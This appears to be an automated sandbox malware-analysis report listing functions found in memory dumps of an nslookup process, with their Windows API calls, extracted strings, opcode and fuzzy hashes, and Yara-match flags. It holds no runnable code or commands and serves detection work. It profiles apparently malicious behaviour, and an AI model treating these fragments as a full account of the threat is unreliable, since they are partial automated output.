Function 037F39B0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 037F39BA

Memory Dump Source

Source File: 0000000B.00000002.4108652203.0000000003780000.00000040.00001000.00020000.00000000.sdmp, Offset: 03780000, based on PE: true

Associated: 0000000B.00000002.4108652203.00000000038A9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.4108652203.00000000038AD000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.4108652203.000000000391E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_3780000_nslookup.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 2110e642f704e756639b125db79f404cee9b8c2279b2024788659a564cb21cf3
Instruction ID: f6694934245f8ec548835362a20888e1abfab5f47523ac129bb69b308d75c554
Opcode Fuzzy Hash: 2110e642f704e756639b125db79f404cee9b8c2279b2024788659a564cb21cf3
Instruction Fuzzy Hash: 9F90022124585546D190B19C48046164005A7E0201F65C061A18195D8D865589996222

Function 02EB0C52 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 63
threadwindowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

PostThreadMessageW.USER32(030c0fG,00000111,00000000,00000000), ref: 02EB0CD7

Strings

030c0fG, xrefs: 02EB0CDE, 02EB0CE1
030c0fG, xrefs: 02EB0CCC, 02EB0CD6, 02EB0CE7

Memory Dump Source

Source File: 0000000B.00000002.4107110027.0000000002EA0000.00000040.80000000.00040000.00000000.sdmp, Offset: 02EA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_2ea0000_nslookup.jbxd

Yara matches

Similarity

API ID: MessagePostThread
String ID: 030c0fG$030c0fG
API String ID: 1836367815-4200685695
Opcode ID: 237eb7c83c36f916ccd1975c398a90a8c96079b2820ced685721604ad6090fa6
Instruction ID: a2af78628e8ec974c971cbca7b8e5eefb5332dfd40190bbbcc44c2d3413bee8f
Opcode Fuzzy Hash: 237eb7c83c36f916ccd1975c398a90a8c96079b2820ced685721604ad6090fa6
Instruction Fuzzy Hash: DE118671D8020D7ADB11AAE48C91EEF7B7DDF41694F05C059FA08A7140D7785E064BA1

Function 02EB0C60 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 60
threadwindowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

PostThreadMessageW.USER32(030c0fG,00000111,00000000,00000000), ref: 02EB0CD7

Strings

030c0fG, xrefs: 02EB0CDE, 02EB0CE1
030c0fG, xrefs: 02EB0CCC, 02EB0CD6, 02EB0CE7

Memory Dump Source

Source File: 0000000B.00000002.4107110027.0000000002EA0000.00000040.80000000.00040000.00000000.sdmp, Offset: 02EA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_2ea0000_nslookup.jbxd

Yara matches

Similarity

API ID: MessagePostThread
String ID: 030c0fG$030c0fG
API String ID: 1836367815-4200685695
Opcode ID: fa7cb059a32baf239195c23600317d6067f9686bb6cd813a44783454bfe65d5b
Instruction ID: b27e7a62d663a77993b5aeeb846cbd9bb3886a3000c6b0cb260ac5c166bda973
Opcode Fuzzy Hash: fa7cb059a32baf239195c23600317d6067f9686bb6cd813a44783454bfe65d5b
Instruction Fuzzy Hash: 9C018871D4020C7ADB11AAE59C81DEF7B7CDF41798F05C058F91867140D6746D068BB1

Function 02EC38D0 Relevance: 4.6, APIs: 1, Strings: 2, Instructions: 108sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNEL32(000007D0), ref: 02EC39AB

Strings

net.dll, xrefs: 02EC3964, 02EC39F6, 02EC39D6, 02EC39E2, 02EC3A02
wininet.dll, xrefs: 02EC393B, 02EC3947

Memory Dump Source

Source File: 0000000B.00000002.4107110027.0000000002EA0000.00000040.80000000.00040000.00000000.sdmp, Offset: 02EA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_2ea0000_nslookup.jbxd

Yara matches

Similarity

API ID: Sleep
String ID: net.dll$wininet.dll
API String ID: 3472027048-1269752229
Opcode ID: 29b66acd79f437cf17e0f250b183475e4381bce420b08a1ddd32f369f311b570
Instruction ID: b8e9eecbae1230a5721c960958fb9bad1b023e1bdc951e3ebc8a295b07109546
Opcode Fuzzy Hash: 29b66acd79f437cf17e0f250b183475e4381bce420b08a1ddd32f369f311b570
Instruction Fuzzy Hash: 4931AEB0A40205BBD718DFA4C980FEBBBB9AB84704F10D55CFA1D6B284C770A611CFA4

Function 02EBF310 Relevance: 4.6, APIs: 2, Strings: 1, Instructions: 101COMMON

Download Yara Rule

APIs

CoInitialize.OLE32(00000000), ref: 02EBF327
CoUninitialize.COMBASE ref: 02EBF40E

Strings

@J7<, xrefs: 02EBF33B

Memory Dump Source

Source File: 0000000B.00000002.4107110027.0000000002EA0000.00000040.80000000.00040000.00000000.sdmp, Offset: 02EA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_2ea0000_nslookup.jbxd

Yara matches

Similarity

API ID: InitializeUninitialize
String ID: @J7<
API String ID: 3442037557-2016760708
Opcode ID: 933aced7dd740fd2ea3f0ec25ef153bc04cd9af5ae3c602ad27583035a88e749
Instruction ID: 51d1f142fe1bf4e425847b311fc60334d16fdc36c99f265bd8790d9c7b144b15
Opcode Fuzzy Hash: 933aced7dd740fd2ea3f0ec25ef153bc04cd9af5ae3c602ad27583035a88e749
Instruction Fuzzy Hash: 733110B5A0060A9FDB00DFD8DC809EFB7B9FF88308B108559E515EB214D775EE458BA0

Function 02EB18A0 Relevance: 3.8, APIs: 1, Strings: 1, Instructions: 269networkCOMMON

Download Yara Rule

APIs

WSAStartup.WS2_32(00000202,?), ref: 02EB1B9B

Strings

#, xrefs: 02EB1AA4

Memory Dump Source

Source File: 0000000B.00000002.4107110027.0000000002EA0000.00000040.80000000.00040000.00000000.sdmp, Offset: 02EA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_2ea0000_nslookup.jbxd

Yara matches

Similarity

API ID: Startup
String ID: #
API String ID: 724789610-1885708031
Opcode ID: 3ef4e0d72f3005f318e96472dceb65a6070b7bff882b650300442a855930d724
Instruction ID: 874851626622552c76a15ba624412fa4f1f68c07628b779da263e91b56016ebc
Opcode Fuzzy Hash: 3ef4e0d72f3005f318e96472dceb65a6070b7bff882b650300442a855930d724
Instruction Fuzzy Hash: D3A190B1D40209AADF11DFA4CC90BDFBBB9AF48318F149069E90CAF245E7709645CBA5

Function 02EBC537 Relevance: 3.1, APIs: 2, Instructions: 57fileCOMMON

Download Yara Rule

APIs

FindNextFileW.KERNELBASE(?,00000010), ref: 02EBC51F
FindClose.KERNEL32(?), ref: 02EBC52A

Memory Dump Source

Source File: 0000000B.00000002.4107110027.0000000002EA0000.00000040.80000000.00040000.00000000.sdmp, Offset: 02EA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_2ea0000_nslookup.jbxd

Yara matches

Similarity

API ID: Find$CloseFileNext
String ID:
API String ID: 2066263336-0
Opcode ID: 4371e09b542904ac36809407273cca881ff2bdcfc212ebcc03da980372d513f1
Instruction ID: c52828cd3cb3b2101de61f3a5e00cd167a5f0688d4124b9f49d436d43e1bf6a6
Opcode Fuzzy Hash: 4371e09b542904ac36809407273cca881ff2bdcfc212ebcc03da980372d513f1
Instruction Fuzzy Hash: 9B01206214814C7FCB299AB4EC44EFF3B3CDF82910F5460DFE84896042E521674483D0

Function 02EB1AFE Relevance: 1.6, APIs: 1, Instructions: 72networkCOMMON

Download Yara Rule

APIs

WSAStartup.WS2_32(00000202,?), ref: 02EB1B9B

Memory Dump Source

Source File: 0000000B.00000002.4107110027.0000000002EA0000.00000040.80000000.00040000.00000000.sdmp, Offset: 02EA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_2ea0000_nslookup.jbxd

Yara matches

Similarity

API ID: Startup
String ID:
API String ID: 724789610-0
Opcode ID: 7a8a19c6e0e1d69a231fbda363eaa1496f2da9c5d3d55a28cd550930351554ee
Instruction ID: 44a5c0913c8113fbbe28bc77c3aa1b6fc1f720b5f0b6bdd861d77b715538387f
Opcode Fuzzy Hash: 7a8a19c6e0e1d69a231fbda363eaa1496f2da9c5d3d55a28cd550930351554ee
Instruction Fuzzy Hash: B411A2B2C452189EDB11DBE48C51BEFB779AF49700F0491AAE90CBB241D63466058FF5

Function 02EB4390 Relevance: 1.5, APIs: 1, Instructions: 48libraryloaderCOMMON

Download Yara Rule

APIs

LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 02EB4402

Memory Dump Source

Source File: 0000000B.00000002.4107110027.0000000002EA0000.00000040.80000000.00040000.00000000.sdmp, Offset: 02EA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_2ea0000_nslookup.jbxd

Yara matches

Similarity

API ID: Load
String ID:
API String ID: 2234796835-0
Opcode ID: 75e85e6d14fdab11c87ec960ad63922ac99c4fa88d2f73f646f6d484ed0c7a20
Instruction ID: 5d42371880c3c67dd743c157ef02738f04cfb2cbd9af20064345294234c67c24
Opcode Fuzzy Hash: 75e85e6d14fdab11c87ec960ad63922ac99c4fa88d2f73f646f6d484ed0c7a20
Instruction Fuzzy Hash: B0015EB5D8020DABDB10EAE4DD41FDEB3B99F04308F1091A9E90897281F631EB158B91

Function 02EC95D0 Relevance: 1.5, APIs: 1, Instructions: 47processCOMMON

Download Yara Rule

APIs

CreateProcessInternalW.KERNEL32(?,?,00000000,?,02EB814E,00000010,?,?,?,00000044,?,00000010,02EB814E,?,00000000,?), ref: 02EC9630

Memory Dump Source

Source File: 0000000B.00000002.4107110027.0000000002EA0000.00000040.80000000.00040000.00000000.sdmp, Offset: 02EA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_2ea0000_nslookup.jbxd

Yara matches

Similarity

API ID: CreateInternalProcess
String ID:
API String ID: 2186235152-0
Opcode ID: 16dfe9cd67a76a700aee18fc964faa5d18bcd8ad268bd675598f28849600af61
Instruction ID: c7a17a7137005b76be5d80d373e993b07cc82630de65680561765f16e7179f60
Opcode Fuzzy Hash: 16dfe9cd67a76a700aee18fc964faa5d18bcd8ad268bd675598f28849600af61
Instruction Fuzzy Hash: F701C0B2241108BBCB44DE89DC80EDB77ADAF8C754F508108BA0DE7241D630F851CBA4

Function 02EA9D50 Relevance: 1.5, APIs: 1, Instructions: 38threadCOMMON

Download Yara Rule

APIs

CreateThread.KERNEL32(00000000,00000000,-00000002,?,00000000,00000000), ref: 02EA9D95

Memory Dump Source

Source File: 0000000B.00000002.4107110027.0000000002EA0000.00000040.80000000.00040000.00000000.sdmp, Offset: 02EA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_2ea0000_nslookup.jbxd

Yara matches

Similarity

API ID: CreateThread
String ID:
API String ID: 2422867632-0
Opcode ID: 6a4ca401b86437604dd3f6e3625fe71da113b57f3624f9d20eabdfcbc927ce18
Instruction ID: 1f2b11f4b02928fdaaa59df33cb83cbf5fa9313eb64b4ddbe56632d05865c4cb
Opcode Fuzzy Hash: 6a4ca401b86437604dd3f6e3625fe71da113b57f3624f9d20eabdfcbc927ce18
Instruction Fuzzy Hash: F2F065733D021436D62061EADD02FD7774D9B81771F245129F60DEF1C0D592B50146E4

Function 02EA9D4C Relevance: 1.5, APIs: 1, Instructions: 34threadCOMMON

Download Yara Rule

APIs

CreateThread.KERNEL32(00000000,00000000,-00000002,?,00000000,00000000), ref: 02EA9D95

Memory Dump Source

Source File: 0000000B.00000002.4107110027.0000000002EA0000.00000040.80000000.00040000.00000000.sdmp, Offset: 02EA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_2ea0000_nslookup.jbxd

Yara matches

Similarity

API ID: CreateThread
String ID:
API String ID: 2422867632-0
Opcode ID: 1955de73e4f700f074fb9d90784f46df52c161650d732ad1e0cfcccc3ed46164
Instruction ID: 5c61a223a9a63758deabf845743d71eb7591a57d3236ef6e62cc5df24a37b2cb
Opcode Fuzzy Hash: 1955de73e4f700f074fb9d90784f46df52c161650d732ad1e0cfcccc3ed46164
Instruction Fuzzy Hash: B8F092733D02143AD63066A9DD02FEB779D9F81760F24511DFA0DEF1C0C6A2B5528AE4

Function 02EC94F0 Relevance: 1.5, APIs: 1, Instructions: 29memoryCOMMON

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(02EB18F6,?,02EC5507,02EB18F6,?,02EC5507,?,02EB18F6,02EC54AF,00001000,?,00000000), ref: 02EC952F

Memory Dump Source

Source File: 0000000B.00000002.4107110027.0000000002EA0000.00000040.80000000.00040000.00000000.sdmp, Offset: 02EA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_2ea0000_nslookup.jbxd

Yara matches

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: 2b463ec047cfe20eafb14ee59cb52557d9eea763486a997a2007afd140000a1e
Instruction ID: 115cf7a7eef1b768ca71c5ba64ee39019e6dede1906ac3535fc570dcba0cdfe9
Opcode Fuzzy Hash: 2b463ec047cfe20eafb14ee59cb52557d9eea763486a997a2007afd140000a1e
Instruction Fuzzy Hash: 3FE06D75244204BFD610EE98DC40F9B37ADEFC9710F008019F918AB241C631B8208AB4

Function 02EC9540 Relevance: 1.5, APIs: 1, Instructions: 29memoryCOMMON

Download Yara Rule

APIs

RtlFreeHeap.NTDLL(00000000,00000004,00000000,D2E1F010,00000007,00000000,00000004,00000000,02EB3C7A,000000F4), ref: 02EC957C

Memory Dump Source

Source File: 0000000B.00000002.4107110027.0000000002EA0000.00000040.80000000.00040000.00000000.sdmp, Offset: 02EA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_2ea0000_nslookup.jbxd

Yara matches

Similarity

API ID: FreeHeap
String ID:
API String ID: 3298025750-0
Opcode ID: c1a5b28e4eb003a82da69d2b12b4df73ea048d6ad08ab51127f596ae75f218b3
Instruction ID: 81be8b58a2bda550f9520dcd172638d6a7c8acb6e12969b2edc723e556fa3307
Opcode Fuzzy Hash: c1a5b28e4eb003a82da69d2b12b4df73ea048d6ad08ab51127f596ae75f218b3
Instruction Fuzzy Hash: E7E06D752442047FD614EE58DC51F9B37ADEFC9760F008019F918A7240D631B911CBB4

Function 02EB7F80 Relevance: 1.5, APIs: 1, Instructions: 21COMMON

Download Yara Rule

APIs

SetErrorMode.KERNEL32(00008003,?,?,02EB1BF0,02EC7DEF,?,02EB1BB4), ref: 02EB7FB3

Memory Dump Source

Source File: 0000000B.00000002.4107110027.0000000002EA0000.00000040.80000000.00040000.00000000.sdmp, Offset: 02EA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_2ea0000_nslookup.jbxd

Yara matches

Similarity

API ID: ErrorMode
String ID:
API String ID: 2340568224-0
Opcode ID: dda90a8090d319d802a5e89c9a1a5c6689b1536e6e520b352795d965fbbce3d2
Instruction ID: c0af961350351cdffcc05806342b675c3afe47493f7e1006233e0d7b84d61eb0
Opcode Fuzzy Hash: dda90a8090d319d802a5e89c9a1a5c6689b1536e6e520b352795d965fbbce3d2
Instruction Fuzzy Hash: 7DD05E762C43043BF710B6F58D16F673A8D5B44794F059068BA0CEB2C2E965F1104679

Function 02EB81B2 Relevance: 1.5, APIs: 1, Instructions: 14COMMON

Download Yara Rule

APIs

GetFileAttributesW.KERNEL32 ref: 02EB81BC

Memory Dump Source

Source File: 0000000B.00000002.4107110027.0000000002EA0000.00000040.80000000.00040000.00000000.sdmp, Offset: 02EA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_2ea0000_nslookup.jbxd

Yara matches

Similarity

API ID: AttributesFile
String ID:
API String ID: 3188754299-0
Opcode ID: 564aa035bb14cd579d8a35bac1d316f849c36bbd2026ac6a66d21791aefd520a
Instruction ID: 96032eff816949f62a40044fa64d4903b19a3d8a264ff2c1dbae0c51861ba118
Opcode Fuzzy Hash: 564aa035bb14cd579d8a35bac1d316f849c36bbd2026ac6a66d21791aefd520a
Instruction Fuzzy Hash: 39C08C312A202804EB20C9FCBC482E3334C9F8233CF146E10F42CDD5E0D22298B79420

Function 037F2C0A Relevance: 1.5, APIs: 1, Instructions: 8libraryCOMMONLIBRARYCODE

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 037F2C24

Memory Dump Source

Source File: 0000000B.00000002.4108652203.0000000003780000.00000040.00001000.00020000.00000000.sdmp, Offset: 03780000, based on PE: true

Associated: 0000000B.00000002.4108652203.00000000038A9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.4108652203.00000000038AD000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.4108652203.000000000391E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_3780000_nslookup.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 29413c6f4608f94349e63597dcd31fc2ba527617e19a98250e2440d640e71cfe
Instruction ID: 951bd7ca2d4e46df1470356467375afb8762163729f65c1685414bd3f8a730c1
Opcode Fuzzy Hash: 29413c6f4608f94349e63597dcd31fc2ba527617e19a98250e2440d640e71cfe
Instruction Fuzzy Hash: 08B09B719019C5CDDB51E7604A087177944B7D0711F29C4A1D3034695F4739C1D5E176

Non-executed Functions

Function 0363DF8A Relevance: 56.5, Strings: 45, Instructions: 215COMMON

Download Yara Rule

Strings

)*+,, xrefs: 0363E07A
@@@@, xrefs: 0363E16F
@@@@, xrefs: 0363E11B
@@@@, xrefs: 0363E0B9
@@@@, xrefs: 0363E10D
@@@@, xrefs: 0363E106
@@@@, xrefs: 0363E129
@@@@, xrefs: 0363E08F
@@@@, xrefs: 0363E114
?, xrefs: 0363E180
123@, xrefs: 0363E088
4567, xrefs: 0363E00A
@@@@, xrefs: 0363E09D
@@@@, xrefs: 0363E168
@@@@, xrefs: 0363E0C7
%&'(, xrefs: 0363E073
@@@@, xrefs: 0363E14C
<=@@, xrefs: 0363E018
@@@@, xrefs: 0363E13E
@@@@, xrefs: 0363E137
89:;, xrefs: 0363E011
@@@@, xrefs: 0363E0C0
@@@@, xrefs: 0363E0F8
@@@@, xrefs: 0363E161
@@@@, xrefs: 0363E096
@@@@, xrefs: 0363E145
@@@@, xrefs: 0363E0AB
@@@@, xrefs: 0363E130
@@@@, xrefs: 0363E01F
@@@@, xrefs: 0363E0CE
@@@@, xrefs: 0363E0A4
@@@@, xrefs: 0363E0B2
-./0, xrefs: 0363E081
@@@@, xrefs: 0363E15A
@@@@, xrefs: 0363E153
@@@?, xrefs: 0363E003
@@@@, xrefs: 0363E0FF
@@@@, xrefs: 0363E0DC
!"#$, xrefs: 0363E06C
@@@@, xrefs: 0363E122
@@@@, xrefs: 0363E0F1
@@@@, xrefs: 0363E0E3
@@@@, xrefs: 0363E0EA
@@@@, xrefs: 0363E057
@@@@, xrefs: 0363E0D5

Memory Dump Source

Source File: 0000000B.00000002.4108585714.0000000003630000.00000040.00000800.00020000.00000000.sdmp, Offset: 03630000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_3630000_nslookup.jbxd

Similarity

API ID:
String ID: !"#$$%&'($)*+,$-./0$123@$4567$89:;$<=@@$?$@@@?$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@
API String ID: 0-3558027158
Opcode ID: 860627927eb25af71fe0f452997f053b92aa5e29e1f872b27376b286ee086f90
Instruction ID: 2b363f03e6e1cccf258b0f6a3731de53c84d8eaec1e8194e4fb3de868a10bc84
Opcode Fuzzy Hash: 860627927eb25af71fe0f452997f053b92aa5e29e1f872b27376b286ee086f90
Instruction Fuzzy Hash: 6C9151F04482948AC7158F54A1612AFFFB1EBC6305F15816DE7E6BB243C3BE89098B95

Function 037F2890 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 190COMMON

Download Yara Rule

APIs

___swprintf_l.LIBCMT ref: 037F293C
___swprintf_l.LIBCMT ref: 037F295E
___swprintf_l.LIBCMT ref: 037F29A3
___swprintf_l.LIBCMT ref: 0382A52E

Strings

::ffff:0:%u.%u.%u.%u, xrefs: 0382A54E
::%hs%u.%u.%u.%u, xrefs: 0382A527
:%u.%u.%u.%u, xrefs: 0382A5B8
ffff:, xrefs: 0382A504

Memory Dump Source

Source File: 0000000B.00000002.4108652203.0000000003780000.00000040.00001000.00020000.00000000.sdmp, Offset: 03780000, based on PE: true

Associated: 0000000B.00000002.4108652203.00000000038A9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.4108652203.00000000038AD000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.4108652203.000000000391E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_3780000_nslookup.jbxd

Similarity

API ID: ___swprintf_l
String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
API String ID: 48624451-2108815105
Opcode ID: 217365975b5fc7f58876deff9625318da5c64a853d2437ac267d32017254a6ea
Instruction ID: 5d6ec69730321d0bd46d83519c799ef6f7f9cb73aad4517d9e0988e1a62a4cd6
Opcode Fuzzy Hash: 217365975b5fc7f58876deff9625318da5c64a853d2437ac267d32017254a6ea
Instruction Fuzzy Hash: 9851E8B9A00156BFCB14DFEC898097FFBB8BF0820175486A9E5A5D7742D734DE409BA0

Function 03862410 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 189COMMON

Download Yara Rule

APIs

___swprintf_l.LIBCMT ref: 038624A6
___swprintf_l.LIBCMT ref: 038624E2
___swprintf_l.LIBCMT ref: 0386257D
___swprintf_l.LIBCMT ref: 038625A3
___swprintf_l.LIBCMT ref: 038625C8
___swprintf_l.LIBCMT ref: 03862608

Strings

:%u.%u.%u.%u, xrefs: 038625FF
::%hs%u.%u.%u.%u, xrefs: 0386249E
ffff:, xrefs: 0386247D, 0386249D
::ffff:0:%u.%u.%u.%u, xrefs: 038624DA

Memory Dump Source

Source File: 0000000B.00000002.4108652203.0000000003780000.00000040.00001000.00020000.00000000.sdmp, Offset: 03780000, based on PE: true

Associated: 0000000B.00000002.4108652203.00000000038A9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.4108652203.00000000038AD000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.4108652203.000000000391E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_3780000_nslookup.jbxd

Similarity

API ID: ___swprintf_l
String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
API String ID: 48624451-2108815105
Opcode ID: 18736d981ef88ad29fef57a26cc50ecacaf020705b9796657dec8ddce85962cb
Instruction ID: 193781f16a6cc3211719aac08f82e983d5acc7c7bb96003e1cd2c3feeccf346b
Opcode Fuzzy Hash: 18736d981ef88ad29fef57a26cc50ecacaf020705b9796657dec8ddce85962cb
Instruction Fuzzy Hash: 9C51D3B5A00649AFDB70DFDCC89097EBBF9AB44201B0488E9E4D6D7681E774DA40C760

Function 037E7630 Relevance: 14.2, APIs: 1, Strings: 7, Instructions: 194COMMON

Download Yara Rule

Strings

Execute=1, xrefs: 03824713
CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 03824742
CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 038246FC
ExecuteOptions, xrefs: 038246A0
CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 03824725
CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 03824655
CLIENT(ntdll): Processing section info %ws..., xrefs: 03824787

Memory Dump Source

Source File: 0000000B.00000002.4108652203.0000000003780000.00000040.00001000.00020000.00000000.sdmp, Offset: 03780000, based on PE: true

Associated: 0000000B.00000002.4108652203.00000000038A9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.4108652203.00000000038AD000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.4108652203.000000000391E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_3780000_nslookup.jbxd

Similarity

API ID:
String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
API String ID: 0-484625025
Opcode ID: 23ad016da884bfcc28966aa17720f880a7e5a4a6c184b525913ba76b5fc54d28
Instruction ID: 705c48784be6be0b0ac120a6effed765f7ae40f2999262cf6ec2430bddfc5cd0
Opcode Fuzzy Hash: 23ad016da884bfcc28966aa17720f880a7e5a4a6c184b525913ba76b5fc54d28
Instruction Fuzzy Hash: 41510975A00359AEEF14EAA8EC89FAE77B8AF08304F0401D9D605EB291E7709A55CF50

Function 03633BFD Relevance: 11.3, Strings: 9, Instructions: 52COMMON

Download Yara Rule

Strings

IMSM, xrefs: 03633C90
KSLF, xrefs: 03633C43
HSM], xrefs: 03633C27
]3)], xrefs: 03633C3C
]*2*, xrefs: 03633C4A
LML], xrefs: 03633C7B
KIF], xrefs: 03633C51
MSMT, xrefs: 03633C5F
MLMM, xrefs: 03633C74

Memory Dump Source

Source File: 0000000B.00000002.4108585714.0000000003630000.00000040.00000800.00020000.00000000.sdmp, Offset: 03630000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_3630000_nslookup.jbxd

Similarity

API ID:
String ID: HSM]$IMSM$KIF]$KSLF$LML]$MLMM$MSMT$]*2*$]3)]
API String ID: 0-694441751
Opcode ID: dd94b85bab932dd93acd00b9ef6187420cfa20da5d41bc3c088230079cf7b000
Instruction ID: c5c81a1ed12900fa3943587d112c29db90a7aec026f5eb84ceddfa50a4f275ba
Opcode Fuzzy Hash: dd94b85bab932dd93acd00b9ef6187420cfa20da5d41bc3c088230079cf7b000
Instruction Fuzzy Hash: AC1133B0844A488ACF14DFE5D4842DEFFB0FB16614F654288D02AAF291DB751582CF86

Function 03886940 Relevance: 9.4, APIs: 6, Instructions: 416COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.4108652203.0000000003780000.00000040.00001000.00020000.00000000.sdmp, Offset: 03780000, based on PE: true

Associated: 0000000B.00000002.4108652203.00000000038A9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.4108652203.00000000038AD000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.4108652203.000000000391E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_3780000_nslookup.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d8848935565deeecae3b40dc4d36252ac36c0d5f22eb4f09df1253b8d6557a4c
Instruction ID: 3992b1770427c25ef365a0e5703085a16d46de58eb1d5255cf4af335fff2ff62
Opcode Fuzzy Hash: d8848935565deeecae3b40dc4d36252ac36c0d5f22eb4f09df1253b8d6557a4c
Instruction Fuzzy Hash: 6C022575508341AFC704EF58C494A6BBBE5FFC8704F148AADBA959B260EB31E905CB42

Function 037FB5EC Relevance: 9.0, APIs: 1, Strings: 4, Instructions: 238COMMON

Download Yara Rule

APIs

__aulldvrm.LIBCMT ref: 037FB6BF

Strings

-, xrefs: 037FB650
0, xrefs: 037FB695
+, xrefs: 037FB65A
0, xrefs: 037FB66F

Memory Dump Source

Source File: 0000000B.00000002.4108652203.0000000003780000.00000040.00001000.00020000.00000000.sdmp, Offset: 03780000, based on PE: true

Associated: 0000000B.00000002.4108652203.00000000038A9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.4108652203.00000000038AD000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.4108652203.000000000391E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_3780000_nslookup.jbxd

Similarity

API ID: __aulldvrm
String ID: +$-$0$0
API String ID: 1302938615-699404926
Opcode ID: 67cbaaaa089a52c9565608c335445b38513441175a6f8a80d34fd58ab3f25221
Instruction ID: 0126823c10d63bee83fc6b24304e51e98f7830daa22dd7220251cabcc9957892
Opcode Fuzzy Hash: 67cbaaaa089a52c9565608c335445b38513441175a6f8a80d34fd58ab3f25221
Instruction Fuzzy Hash: 1E81D074E052499EDF24CE68C8917FEBBB6BF85320F1C415EDA61A7391C7349840CBA1

Function 038620E0 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 84COMMON

Download Yara Rule

APIs

___swprintf_l.LIBCMT ref: 0386214F
___swprintf_l.LIBCMT ref: 03862172

Strings

[, xrefs: 0386212B
]:%u, xrefs: 03862169
%%%u, xrefs: 03862146

